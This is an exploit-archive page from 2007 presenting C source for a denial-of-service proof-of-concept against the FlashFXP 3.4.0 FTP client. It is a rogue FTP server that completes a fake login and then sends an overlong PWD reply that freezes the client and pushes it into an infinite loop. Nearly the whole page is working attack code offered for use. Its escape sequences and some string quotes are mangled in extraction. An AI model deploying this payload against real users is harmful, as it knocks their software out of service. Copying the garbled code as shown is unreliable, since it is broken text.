[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit
# Published : 2007-02-06
# Author : Marsu
# Previous Title : Axigen <= 2.0.0b1 Remote Denial of Service Exploit (2)
# Next Title : SmartFTP Client 2.0.1002 Remote Heap Overflow DoS Exploit
/***************************************************************************
* FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS *
* *
* *
* There's a strange bug in FlashFXP. *
* When sending a long PWD command with more than 5420 separated by at *
* least one different char, it is possible to make the app unstable. *
* It will first freeze during 45s consuming 100% resources, and then, if *
* the user hits disconnect and then reconnects to the server it will enter *
* in an infinite loop trying to put data on the stack. *
* *
* *
* I admit it is a little bit tricky but maybe someone will find a better *
* way to exploit this vuln. *
* *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
***************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[11000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
int n=1;
while (n<=2)
{
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[*] Listening on port 21...n");
listen(server,5);
printf("[*] Waiting for client ...n");
client=accept(server,NULL,NULL);
printf("[+] Client connectedn");
memcpy(evilbuff,"220 Hello therern�",18);
memset(recvbuff,'�',1024);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!n");
exit(-1);
}
//USER
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"331 rn�",7);
send(client,evilbuff,strlen(evilbuff),0);
Sleep(50);
//PASS
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"230 rn�",7);
send(client,evilbuff,strlen(evilbuff),0);
//SYST
memset(recvbuff,'�',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"215 WINDOWSrn�",14);
send(client,evilbuff,strlen(evilbuff),0);
//FEAT
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"211 ENDrn�",10);
send(client,evilbuff,strlen(evilbuff),0);
//PWD
int i=5;
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
while (i<10840) {
memset(evilbuff+i,'a',1);
i++;
memset(evilbuff+i,'//',1);
i++;
}
memcpy(evilbuff,"257 "",5);
memcpy(evilbuff+10840,""rn�",4);
send(client,evilbuff,strlen(evilbuff),0);
closesocket(client);
closesocket(server);
client=server=NULL;
if (n<2) {
printf("[+] Now FlashFXP is out for 45sec.n");
printf("[+] Note that user MUST click on disconnect and then reconnectn
to trigger the bug.nn");
}
n++;
}
Sleep(2000);
printf("n[+] FlashFXP must be DoSedn");
return 0;
}
// www.Syue.com [2007-02-06]